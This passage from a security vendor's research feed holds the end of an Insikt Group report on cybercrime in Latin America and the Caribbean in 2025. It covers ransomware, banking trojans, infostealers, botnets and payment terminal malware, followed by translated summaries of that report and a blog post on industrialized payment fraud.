          <li>Brazil’s network intrusion risk score increased from Medium to Very High, and Brazil’s ransomware targeting risk score remained Medium by the end of 2025. Brazil was the most targeted country in LAC and among the top ten countries worldwide impacted by ransomware in 2025, with a total of 130 victims.</li>
          <li>Mexico’s network intrusion risk score increased from Very Low to Low, and Mexico’s ransomware targeting risk score increased from Low to Medium at the end of 2025. Notably, data was leaked relating to a Mexican government entity on the dark web name-and-shame extortion website, Tekir Apt Data Leak Site.</li>
          <li>Argentina’s network intrusion risk score increased from Very Low to Low, and Argentina’s ransomware targeting risk score increased from Low to Medium at the end of 2025. Insikt Group observed that Argentina was targeted by a new Rust-based ransomware, “RALord”.</li>
          <li>Colombia’s network intrusion risk score increased from Low to High, and Colombia’s ransomware targeting risk score remained Low with no observed changes at the end of 2025. Colombia’s financial sector was impacted by the ransomware group Crypto24, which posted victims' names on its blog.</li>
          <li>Peru’s network intrusion risk score increased from Very Low to Low, and Peru’s ransomware targeting risk score was Low with no observed changes at the end of 2025. A pharmaceutical company headquartered in Peru was named as a victim on the Dire Wolf Blog.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1dac72236ed639639adfd668cafbc142247671aae.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="825" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Global Ransomware Landscape Dashboard view of the most affected countries in LAC in 2025 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Banking Trojans</h2>
        <p>According to the Global System for Mobile Communications Association (GSMA), in 2024, approximately 64% of the LAC population used mobile internet; it is <a href="https://www.gsma.com/solutions-and-impact/connectivity-for-good/mobile-economy/wp-content/uploads/2025/05/GSMA_Latam_ME2025_R_Web.pdf">projected</a> that this will increase to nearly three-quarters by 2030. <a href="https://publications.iadb.org/en/publications/english/viewer/2025-Cybersecurity-Report-Vulnerability-and-Maturity-Challenges-to-Bridging-the-Gaps-in-Latin-America-and-the-Caribbean.pdf">Increasing</a> internet penetration and high cell phone subscription rates in LAC signify a rising reliance on mobile devices, likely making them more appealing targets for threat actors. <a href="https://gs.statcounter.com/os-market-share/mobile/south-america/2025">Android</a> remains the predominant operating system (OS) of mobile devices in South America with an 84.59% market share. Android devices may support more sideloaded applications (links and Android application packages [APKs] from social media or third-party stores) than Apple iOS, which typically has tighter ecosystem controls, and Android users may be running older OS versions, thereby making Android devices attractive targets for cybercriminals. The Android ecosystem grants developers more freedom to list apps within the Google Play Store, and the vetting and verification process is less stringent, allowing malicious APK domain mirrors to go undetected. In LAC, users may rely on mobile phones as their <a href="https://www.undp.org/sites/g/files/zskgke326/files/2022-09/undp-rblac-Digital-EN.pdf">primary</a> or only computing device, making them desirable initial access points for threat actors to deploy Android-based malware. According to the <a href="https://www.worldbank.org/en/publication/globalfindex">World Bank's</a> Global Findex 2025 report, 37% of adults in the LAC region had a mobile money account as of 2024. Mobile banking, digital wallets, and QR payments are commonplace in the area. Based on the World Bank’s findings, Insikt Group assesses that persistent mobile banking malware targeting LAC is likely driven by rapid digital banking integration that has outpaced security controls and the expansion of MaaS ecosystems. Sophisticated localized social engineering attacks and disproportionate regional enforcement capacity are further accelerating this trend within LAC’s ever-evolving mobile financial landscape.</p>
        <p>Insikt Group research reflected an increase in banking trojans targeting the WhatsApp platform in 2025. Brazilian authorities have, in recent years, focused their attention on <a href="https://therecord.media/brazil-police-arrests-grandoreiro-banking-trojan-suspects">disrupting</a> banking trojans. A significant amount of crimeware in LAC consists of mobile banking trojans; although they are similar in many ways, they are not a monolith, and each family differs in distinct ways. Insikt Group analysis from 2025 reflects that, despite some law enforcement disruptions, banking trojans are still a prominent issue in the LAC region and will likely continue to be in 2026. <strong>Appendix D</strong> highlights the most active banking trojans across the LAC region in 2025.</p>
        <h2>Infostealers</h2>
        <p>Infostealers pose a persistent threat worldwide, and the LAC region is no exception. Insikt Group analyzed a small sample of the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors across the top five largest economies in LAC. Analysis showed that the most prominent infostealer threats observed in 2025 were LummaC2, Vidar, Rhadamanthys, RedLine, and Nexus. This is despite multiple law enforcement operations under Operation Endgame conducting takedowns impacting <a href="https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down">Rhadamanthys</a> and <a href="https://www.justice.gov/opa/pr/justice-department-seizes-domains-behind-major-information-stealing-malware-operation">LummaC2</a>.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_10acef9d339a54f3193b63b20cdcf8ebd3a52f4a8.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="636" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 5:</strong></em> <em>Infostealers infection trends in 2025 for the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors for countries with the top five largest economies in LAC (Source: Recorded Future data)</em></div>
          </div>
        </div>
        <p>LummaC2 was undoubtedly the most active infostealer targeting entities in the LAC region despite being targeted by law enforcement. LummaC2 has been discussed in several news sources and Telegram chatter as targeting users in Argentina, Paraguay, and Mexico. Cybercriminals deploy LummaC2 to obtain victim credentials to carry out financial fraud and cryptocurrency theft. Insikt Group conducted research into LummaC2 affiliates and identified a likely Mexico-based threat actor operating under multiple aliases linked to Lumma build ID “re0gvc”. In mid-2025, law enforcement took measures to disrupt LummaC2; the operation effectively led to the takedown of approximately 2,300 malicious domains integral to LummaC2’s infrastructure, Lumma’s central command, and associated criminal marketplaces. Shortly after this operation, it appears LummaC2 still had infected victims in several countries, including Brazil and Colombia, likely because <a href="https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/">sinkholing</a> requires some time to have a noticeable effect as it redirects traffic but does not automatically clean infected machines. More complete remediation would require patching and malware removal on affected systems, which is challenging to implement at scale when infected devices are spread across the world. However, Insikt Group observed a significant decrease in credentials exposed by LummaC2 in the second half of 2025, likely due to the success of the joint Microsoft and law enforcement operation, as well as the main threat actor being banned from Exploit.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15861d6f118617071c82f361bbec193b87feccd4d.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="397" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 6:</strong></em> <em>LummaC2 infection trends in 2025 for the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors for countries with the top five largest economies in LAC (Source: Recorded Future data)</em></div>
          </div>
        </div>
        <p>In the wake of the LummaC2 operation, Recorded Future detected an increase in Vidar infections during the latter half of 2025. This increase highlights threat actors’ ability to migrate between infostealers to facilitate their criminality despite disruptions.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1039a8a696c49e31ab94796a1a8b0e40112173726.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="397" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 7:</strong></em> <em>Vidar infection trends in 2025 for the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors for countries with the top five largest economies in LAC (Source: Recorded Future data)</em></div>
          </div>
        </div>
        <h2>Botnets</h2>
        <p>Botnet activity has grown steadily in the LAC region, enabling financial fraud, spam distribution, credential harvesting, initial access for ransomware and large-scale DDoS attacks targeting financial and government institutions. Botnets remained a priority for international law enforcement in 2025. For example, the ongoing <a href="https://www.europol.europa.eu/operations-services-and-innovation/operations/operation-endgame">Operation Endgame</a> aims to hinder threat actors' remote-control capabilities by dismantling ransomware and other malware infrastructure. Emerging in late 2025, Kimwolf, also known as AISURU, is a botnet that targets compromised streaming devices. News reporting and dark web chatter indicate many of the devices infected with Kimwolf are based in Brazil, India, the US, and Argentina. Additional <a href="https://krebsonsecurity.com/2026/01/who-benefited-from-the-aisuru-and-kimwolf-botnets/">reporting</a> suggests a threat actor involved with the AISURU botnet is likely based in Brazil. Horabot is a malware family and type of botnet first identified in June 2023, targeting Spanish-speaking users in six LAC countries: Mexico, Guatemala, Colombia, Peru, Chile, and Argentina. Horabot uses invoice-themed phishing emails to gain initial access to victims' systems.</p>
        <h2>Payment Terminal Malware</h2>
        <p>Threat actors also continued to target payment infrastructure for financial gain. ATM malware activity has continued to <a href="https://www.mcsystems.com/insight/atm-malware-attacks-on-the-rise-in-the-region-warns-fintech-expert/">rise</a> in LAC, with some experts noting ATM malware attacks have spiked by 46% across LAC in 2025. For instance, Ploutus is a sophisticated malware family first detected in Mexico in 2013, which compromises ATMs by issuing unauthorized commands to their cash dispensing modules. In <a href="https://therecord.media/doj-charges-gang-malware-ploutus">December</a> 2025, the US Department of Justice indicted 54 individuals associated with the Venezuelan gang Tren de Aragua (TDA) for participation in a massive ATM jackpotting scheme that exploited Ploutus malware. Moreover, the POS malware MajikPOS, designed to infiltrate systems connected to POS terminals and extract magnetic stripe payment data from bank cards, remained an active threat to companies operating in Brazil.</p>
        <h2>Mitigations</h2>
        <ul>
          <li><strong>Use Recorded Future’s Global Ransomware Landscape Dashboard</strong>: Recorded Future customers can proactively mitigate this threat by operationalizing the Recorded Future Global Ransomware Landscape Dashboard and leveraging the victimology tab to filter based on ransomware group, country, and industry of interest. Recorded Future customers can customize their own ransomware risk profile and establish alerts that align with their risk priorities.</li>
          <li><strong>Use Recorded Future’s Threat and Third-Party Risk Monitoring</strong>: Configure alerts in the Recorded Future Intelligence Cloud to track activity across Telegram channels, darkweb forums, and other platforms for proactive awareness. Use the Third-Party Intelligence module to assess risk exposure for current and future partnerships.</li>
          <li><strong>Update Legacy Systems</strong>: Threat actors, whether opportunistic or financially motivated, or both, often seek to exploit vulnerable systems. Organizations that rely on outdated technology stacks leave themselves exposed to preventable cyber threats and attacks.</li>
          <li><strong>Engage in Public-Private Information Sharing</strong>: Coordinate with law enforcement and create intelligence-sharing channels to bolster regional collaboration, establish standardized best practices, enhance investigations, and decrease incident response times.</li>
          <li><strong>Generate Awareness through Education</strong>: Advocating for digital literacy through university partnerships and scholarship in the LAC region will encourage good cyber hygiene and prepare for a stronger, more competent workforce. Enterprises can implement mandatory cybersecurity training during new hire onboarding and establish routine drills to ensure protocols are followed.</li>
        </ul>
        <h2>Outlook</h2>
        <p>Insikt Group has highlighted the most salient cybercriminal trends and methods observed throughout the LAC region in 2025. Threat actors conducted phishing and credential theft to gain and sell initial access to LAC organizations while often relying on dark web forums and end-to-end encrypted messaging platforms to communicate and monetize compromised data and access methods. Cybercriminals carried out elevated ransomware attacks against the healthcare, government, finance, and other critical sectors. Banking trojan and infostealer activity persisted throughout LAC despite law enforcement disruption attempts. Cybercriminals have proven to be adaptive and resilient, often capitalizing on immature or emerging businesses that lack the skills, tools, and personnel to prevent attacks. Small and medium-sized enterprises (SMEs) constitute over <a href="https://www.eucybernet.eu/wp-content/uploads/2025/09/guide-for-smes-lac4-2025-september-2025.pdf">95%</a> of all businesses in LAC. SMEs are desirable targets for cybercriminals because they typically have limited resources and expertise, lack robust infrastructure, and have a high overreliance on third-party platforms. Insikt Group trend analysis supports these findings.</p>
        <p>Absent regional harmonization of cybersecurity policies and best practices, LAC countries will likely continue to use fragmented incident response approaches, complicating cross-border cooperation and collaboration. For effective and sustainable protection of systems and information against cyber threats, LAC countries should work together to establish standardized risk assessments and reporting mechanisms, create information-sharing protocols that support timely remediation, and implement proactive “secure by design” principles. Possible <a href="https://digiamericas.org/wp-content/uploads/2024/05/LATAM-CISO-REPORT-2024_.pdf">approaches</a> to accomplishing this may include increased investment in workforce development, participation in public-private partnerships, and the establishment of centralized cybersecurity management systems. Despite the lack of prominent Spanish- and Portuguese-language forums, it is likely that threat actors will continue to leverage traditional platforms and methods similar to those used by the English- and Russian-speaking cybercriminal underground. Based on current and historical data, we anticipate these trends will continue, and LAC will likely remain a popular target for ransomware groups and a hotspot for mobile malware in 2026.</p>
        <h2>Appendix A: Sample Listing of Posts Targeting Entities in LAC Countries on Dark Web and Special Access Forums</h2>
        <table>
          <thead>
            <tr>
              <th>Alleged Access or Leak</th>
              <th>Source</th>
              <th>LAC Country and Sector Impacted</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>Access to a Brazilian banking entity</td>
              <td>XSS Forum</td>
              <td>Brazil/Finance</td>
            </tr>
            <tr>
              <td>VPN access to a Colombian bank</td>
              <td>Exploit Forum</td>
              <td>Colombia/Finance</td>
            </tr>
            <tr>
              <td>Access to a leaked government database</td>
              <td>DarkForums</td>
              <td>Mexico/Government</td>
            </tr>
            <tr>
              <td>Database access to the official government portal</td>
              <td>Exploit Forum</td>
              <td>Argentina/Government</td>
            </tr>
            <tr>
              <td>Web shell access with root privileges for a healthcare provider</td>
              <td>XSS Forum</td>
              <td>Chile/Healthcare</td>
            </tr>
            <tr>
              <td>Global VPN access to a healthcare network</td>
              <td>RehubcomPro Forum</td>
              <td>Brazil/Healthcare</td>
            </tr>
          </tbody>
        </table>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix B: Sample Metrics of the Top Five Ransomware Groups Impacting LAC in 2025</h2>
        <table>
          <thead>
            <tr>
              <th>Group Name</th>
              <th>Total Attacks (All Sectors)</th>
              <th>Healthcare</th>
              <th>Manufacturing</th>
              <th>Government</th>
              <th>IT</th>
              <th>Education</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>Qilin (Agenda)</td>
              <td>54</td>
              <td>4</td>
              <td>6</td>
              <td>0</td>
              <td>2</td>
              <td>2</td>
            </tr>
            <tr>
              <td>LockBit Gang (BITWISE SPIDER, DEV-0396, Flighty Scorpius)</td>
              <td>29</td>
              <td>2</td>
              <td>3</td>
              <td>1</td>
              <td>1</td>
              <td>4</td>
            </tr>
            <tr>
              <td>Safepay</td>
              <td>27</td>
              <td>2</td>
              <td>4</td>
              <td>0</td>
              <td>0</td>
              <td>0</td>
            </tr>
            <tr>
              <td>The Gentlemen</td>
              <td>22</td>
              <td>3</td>
              <td>1</td>
              <td>0</td>
              <td>0</td>
              <td>1</td>
            </tr>
            <tr>
              <td>Kazu</td>
              <td>21</td>
              <td>0</td>
              <td>0</td>
              <td>17</td>
              <td>0</td>
              <td>2</td>
            </tr>
          </tbody>
        </table>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix C: Sample Data of Ransomware Incidents Impacting Healthcare, Government, and Financial Sectors in LAC Countries in 2025</h2>
        <table>
          <thead>
            <tr>
              <th>Ransomware Group</th>
              <th>Country</th>
              <th>Sector</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>Safepay</td>
              <td>Argentina</td>
              <td>Healthcare</td>
            </tr>
            <tr>
              <td>The Gentlemen</td>
              <td>Brazil</td>
              <td>Healthcare</td>
            </tr>
            <tr>
              <td>Kazu</td>
              <td>Colombia</td>
              <td>Government</td>
            </tr>
            <tr>
              <td>Kazu</td>
              <td>Mexico</td>
              <td>Government</td>
            </tr>
            <tr>
              <td>Qilin (Agenda)</td>
              <td>Ecuador</td>
              <td>Finance</td>
            </tr>
            <tr>
              <td>Qilin (Agenda)</td>
              <td>Argentina</td>
              <td>Finance</td>
            </tr>
          </tbody>
        </table>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix D: Trends from the Most Active Banking Trojans in LAC in 2025</h2>
        <table>
          <thead>
            <tr>
              <th>Banking Trojan</th>
              <th>Attributes</th>
              <th>Activity in 2026</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>Grandoreiro</td>
              <td>Spreads through phishing emails with seemingly legitimate documents, such as PDFs. Once on a device, it performs anti-sandbox checks, logs keystrokes, and communicates with C2 servers to exfiltrate sensitive banking credentials</td>
              <td>New variants emerged with advanced evasion techniques, rendering them more effective at bypassing modern security measures</td>
            </tr>
            <tr>
              <td>Crocodilus</td>
              <td>Employs sophisticated tactics such as remote control capabilities, keylogging, overlay attacks to capture user credentials, and the ability to harvest cryptocurrency wallet seed phrases</td>
              <td>Expanded operational reach by targeting users in Poland, Spain, Brazil, Argentina, Indonesia, the US, and India</td>
            </tr>
            <tr>
              <td>Mispadu (URSA)</td>
              <td>Employs sophisticated infection methods, including spam emails containing malicious PDFs that trigger multi-stage download processes that deploy the Mispadu payload after performing anti-sandbox and anti-virtual machine checks</td>
              <td>Insikt Group created a YARA rule to detect Mispadu after analysis indicated the trojan had targeted several LAC banks</td>
            </tr>
            <tr>
              <td>Astaroth (Guildma)</td>
              <td>Distribution methods include spearphishing attacks and the use of compromised cloud infrastructure for hosting malicious content. Insikt Group conducted technical static analysis and detection using Sigma rules</td>
              <td>Resurfaced with a multi-stage campaign, “STAC3150”, involving WhatsApp session hijacking, credential theft, and persistence on compromised systems</td>
            </tr>
            <tr>
              <td>SORVEPOTEL</td>
              <td>Targeted Brazil in several campaigns; Insikt Group assesses that at least some SORVEPOTEL operators are likely Portuguese-speaking, based on language artifacts in the panels analyzed and consistent targeting of Brazilian victims; analysis of a notable campaign dubbed “Water Saci” indicates WhatsApp Web was used for distribution</td>
              <td>Analysis of the new infrastructure tied to the SORVEPOTEL loader demonstrates that it has distributed Coyote and Maverick</td>
            </tr>
            <tr>
              <td>Casbaneiro (“Mekotio” and “Metamorfo”)</td>
              <td>Primarily targets financial institutions in LAC; leverages phishing emails that typically contain malicious URLs, which lead to ZIP archives or ISO files with payloads that execute PowerShell scripts designed for obfuscation and evading detection</td>
              <td>Water Saci campaign targeting Brazilian financial platforms via WhatsApp propagation linked to the Casbaneiro malware family</td>
            </tr>
            <tr>
              <td>BBTok</td>
              <td>Distribution methods trigger infections via LNK files; exhibits advanced capabilities for credential theft and data exfiltration, leveraging techniques such as dynamic-link library (DLL) embedding within downloaded files and the use of legitimate Windows utility commands for evasion</td>
              <td>A new tactic emerged where the primary delivery method was WhatsApp</td>
            </tr>
            <tr>
              <td>Coyote</td>
              <td>Primarily targets Brazilian users; capable of executing keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials; Coyote’s infrastructure is dynamic and hosted on various platforms, indicating robust evasion techniques by its operators</td>
              <td>Coyote remained active in 2025 and was observed in a WhatsApp-based worm campaign that used self-propagating messages containing malicious ZIP archives that further distributed the malware</td>
            </tr>
            <tr>
              <td>Herodotus</td>
              <td>Distributed through smishing messages that lure victims into downloading malicious APKs; Herodotus has been observed primarily targeting users in countries such as Brazil and Italy</td>
              <td>Insikt Group analyzed a sample in which Herodotus impersonated a security application named “Modulo Seguranca Stone” in a campaign in Brazil</td>
            </tr>
          </tbody>
        </table>
        <p><em>(Source: Recorded Future)</em></p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_170df75f7415b871f0e4a8ee069a6ce7922d8e7ae.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Cybercrime Landscape in Latin America and the Caribbean]]></title>
            <link>https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape-es</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape-es</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This report provides an overview of the trends and developments in the cybercriminal ecosystem of Latin America and the Caribbean (LAC) in 2025.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>This report provides an overview of trends and developments in the Latin America and the Caribbean (LAC) cybercriminal ecosystem in 2025. Insikt Group found that threat actors operating in or targeting the LAC region predominantly use client-server applications and end-to-end encrypted messaging platforms such as Telegram, as well as English- or Russian-language dark web and special-access forums, to communicate and carry out their activities. Threat actors show increasing sophistication in their operations, adapting their tactics, techniques, and procedures (TTPs) over time, but they still rely mainly on traditional methods such as phishing and social engineering, malware distribution, and ransomware. Based on our analysis, we determined that Brazil, Mexico, and Argentina are the countries most targeted by financially motivated cybercriminals, likely because they are the largest economies in the LAC region. In addition, through this research, Insikt Group determined that threat actors often target critical industries such as healthcare, finance, and government because they hold high-value data, face operational urgency, and sometimes run legacy systems that may be vulnerable.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group assesses that the criminal forum DarkForums and the messaging platform Telegram are the main special-access venues used by threat actors operating in or targeting the LAC region.</li>
          <li>Threat actors operating in or targeting the LAC region are usually financially motivated and often use social engineering, ransomware, and various forms of mobile malware to gain initial access to government, healthcare, or financial institutions.</li>
          <li>In 2025, Insikt Group recorded 452 ransomware incidents affecting the LAC region. The five most affected industries were healthcare, manufacturing, government, information technology, and education; all of them saw a notable increase in attacks compared with the previous year.</li>
          <li>Insikt Group found that threat actors use banking trojans, especially the more established variants. In particular, these actors used banking trojans in smishing campaigns targeting WhatsApp users in order to access financial data and steal credentials.</li>
          <li>Insikt Group identified LummaC2 as the most prolific infostealer affecting organizations in the LAC region in the first half of 2025, and Vidar in the second half, following the law enforcement action against LummaC2.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_170df75f7415b871f0e4a8ee069a6ce7922d8e7ae.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Cybercrime Landscape in Latin America and the Caribbean]]></title>
            <link>https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape-pt</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape-pt</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This report provides an overview of trends and developments in the Latin America and the Caribbean (LAC) cybercriminal ecosystem in 2025.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>This report presents an overview of trends and developments in the cybercrime ecosystem of Latin America and the Caribbean (LAC) in 2025. Insikt Group found that threat actors operating in or targeting the Latin America and Caribbean (LAC) region predominantly use client-server applications and end-to-end encrypted messaging platforms, such as Telegram, as well as established English- or Russian-language dark web and restricted-access forums, to communicate and carry out their activities. Threat actors show growing operational sophistication, adapting tactics, techniques, and procedures (TTPs) over time, though they still rely mainly on traditional methods such as phishing and social engineering, malware distribution, and ransomware. Based on our analysis, we determined that Brazil, Mexico, and Argentina were the countries most targeted by financially motivated cybercriminals, likely because they are the largest economies in Latin America and the Caribbean. In addition, based on this research, Insikt Group found that threat actors frequently targeted critical sectors such as healthcare, finance, and government, as these sectors hold valuable data, face operational urgency, and sometimes depend on legacy systems that may be vulnerable.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group assesses that the criminal forum DarkForums and the messaging platform Telegram are the main restricted-access forums and communication platforms used by threat actors operating in or targeting the Latin America and Caribbean region.</li>
          <li>Threat actors operating in or targeting Latin America and the Caribbean (LAC) are generally financially motivated and frequently rely on social engineering, ransomware, and various forms of mobile device malware to gain initial access to government, financial, and healthcare institutions.</li>
          <li>In 2025, Insikt Group recorded 452 ransomware incidents affecting the Latin America and Caribbean region. The five most affected sectors were healthcare, manufacturing, government, information technology, and education, all of which recorded a considerable increase in attacks compared with the previous year.</li>
          <li>Insikt Group continued to identify banking trojans being used by threat actors; the most used are the already established variants. Specifically, threat actors used banking trojans in smishing campaigns targeting WhatsApp users to gain access to financial data and steal credentials.</li>
          <li>Insikt Group identified LummaC2 as the most prolific infostealer affecting organizations in Latin America and the Caribbean in the first half of 2025, and Vidar in the second half, after law enforcement disrupted LummaC2's operations.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_170df75f7415b871f0e4a8ee069a6ce7922d8e7ae.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Industrialization of the Fraud Ecosystem Blog]]></title>
            <link>https://www.recordedfuture.com/ko/blog/industrialization-of-the-fraud-ecosystem-blog</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/industrialization-of-the-fraud-ecosystem-blog</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Payment fraud has industrialized, and that's a defensive advantage. Learn how standardized attack infrastructure creates detectable patterns that financial institutions can act on before losses occur.]]></description>
            <content:encoded><![CDATA[
        <p>Payment fraud no longer operates as a collection of discrete schemes run by individual threat actors.</p>
        <p>It is increasingly sustained by an industrial support ecosystem: purpose-built infrastructure, packaged toolkits, and professionalized services that allow threat actors to maximize fraud output while minimizing the skill and effort required to execute attacks.<br /><br />According to Recorded Future's <a href="https://go.recordedfuture.com/Payment_Fraud_Intelligence_Report_2025.html">Annual Payment Fraud Intelligence Report: 2025</a>, this industrialization was driven by technical advances and increasingly professionalized support services.</p>
        <p>The Magecart e-skimmer supply chain is the clearest example. Full-stack e-skimmer kits and Malware-as-a-Service (MaaS) offerings have made large-scale compromise of ecommerce websites accessible to less technically capable threat actors.</p>
        <p>The "Sniffer by Fleras" kit, responsible for 26% of all e-skimmer infections observed in 2025, includes a web-based portal for generating malicious scripts and a management server for stolen data. The result was more than 10,500 unique Magecart infections active at some point during the year, likely compromising more than 23 million transactions.</p>
        <p>Additionally, the "AcceptCar" e-skimmer, discovered in H2 2025, illustrates how far the service model has matured. Operators handle installation and operation on compromised e-commerce sites; in return, threat actors pay 50% of proceeds from card data sales or 70% of raw data intake. Using services like AcceptCar, fraud threat actors can participate in large-scale compromise operations without owning or managing any underlying infrastructure.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1cf0554d71b8866a15155b12102ca303275f2a8cd.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="804" />
            </div>
          </div>
          <div>
            <div>Figure 1: Line graph showing Magecart e-skimmer infections in 2025, by different groups, kits, and techniques. (Source: Recorded Future)</div>
          </div>
        </div>
        <p><a href="https://pages.recordedfutureext.com/2025-Purchase-Scams-Report.html?_gl=1*1t58uut*_gcl_au*NTQ0NDYzNDU2LjE3NzI0ODkyMDc.">Purchase scam operations</a> reflect a similar dynamic. <a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Recorded Future Payment Fraud Intelligence</a> identified more than 3,600 scam merchant accounts in 2025, up 2.5x from 2024, spanning at least 40 countries and 230 acquirers.</p>
        <p>Recurring patterns in merchant registration data indicate that scam operators have standardized their merchant acquisition workflows, standing up fraudulent payment infrastructure at scale through repeatable, low-friction processes.</p>
        <p>Card testing operates on the same service-economy logic. Telegram-based card testing services validated at least 27 million card records in 2025 through public-facing card generation and testing channels that any threat actor can access.</p>
        <p>Among dark web checker services, over 1,350 legitimate merchant accounts were abused for card testing, with 94% not observed prior to 2025, suggesting systematic rotation to stay ahead of detection.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_102beab38154914c05c00b2fffd52e34417ac6a84.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="466" />
            </div>
          </div>
          <div>
            <div>Figure 2: Graphic illustrating the purchase scam attack chain. (Source: Recorded Future)</div>
          </div>
        </div>
        <h2>The Ecosystem Is Concentrated Upstream</h2>
        <p>Notably, each of these industrialized attack vectors sits <a href="https://www.recordedfuture.com/ko/blog/getting-ahead-of-payment-fraud">upstream of the fraudulent transaction</a>. E-skimmer infections and scam merchants compromise card data during online purchases. Card testing validates that stolen data before it’s monetized.</p>
        <div>
          <div>
            <div>
              <p>Fraud outcomes are visible, but the pathways that enable them are often not.</p>
              <p><a href="https://go.recordedfuture.com/Payment_Fraud_Intelligence_Report_2025.html">Annual Payment Fraud Intelligence Report: 2025</a></p>
            </div>
          </div>
        </div>
        <p>This industrialized scale across these attack vectors requires standardization, and standardization produces detectable patterns.</p>
        <p>When 26% of e-skimmer infections trace back to a single kit, when scam operators reuse merchant registration patterns across hundreds of acquirers, when card testers rotate through predictable BIN attack workflows, the convergence that makes fraud scalable also makes it mappable. As that standardization deepens, a single indicator of compromise reaches further across the threat landscape.</p>
        <p>That standardization creates something concrete: a window.</p>
        <p>Magecart infections are active and identifiable before stolen card data is harvested.<br />Scam merchants often display detectable signals, including recent domain registration, merchant rotation, and merchant category code mismatches.</p>
        <p>Card testing activity reveals when a monetization attempt is likely to occur.</p>
        <p>Each stage represents an opportunity to act before fraud registers as a financial loss.</p>
        <h2>Transaction Monitoring Looks at the Wrong End of the Lifecycle</h2>
        <p>Transaction monitoring and behavioral fraud models are built to detect anomalies at the point of payment, like unusual spend patterns, velocity, and geographic inconsistencies. They do what they were designed to, but provide no visibility into the increasingly industrialized, pre-monetization stages that were built to avoid detection by these traditional processes.</p>
        <p>Purchase scams are explicitly designed to circumvent transaction-based controls by manipulating cardholders into authorizing the fraudulent transaction themselves, making the payment appear legitimate by design.</p>
        <p>Card testers cycle through new merchants specifically because historical tester merchants get flagged (94% of tester merchants identified in 2025 were not previously observed). A detection approach built around transaction signals will always be working with information that arrives after the upstream infrastructure has already done its job.</p>
        <p>As the upstream ecosystem industrializes, the volume of activity that transaction monitoring cannot see has grown. With purchase scam detections more than quadrupling year-over-year and Magecart infections having likely compromised more than 23 million transactions in 2025 alone, the cost of that blind spot compounds.</p>
        <p><strong>Maintaining an effective fraud posture will increasingly require financial institutions to complement reactive account monitoring with proactive, intelligence-informed defenses.</strong></p>
        <h2>How Recorded Future Payment Fraud Intelligence Addresses This</h2>
        <p><a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Recorded Future Payment Fraud Intelligence</a> monitors each of the upstream stages discussed in this post.</p>
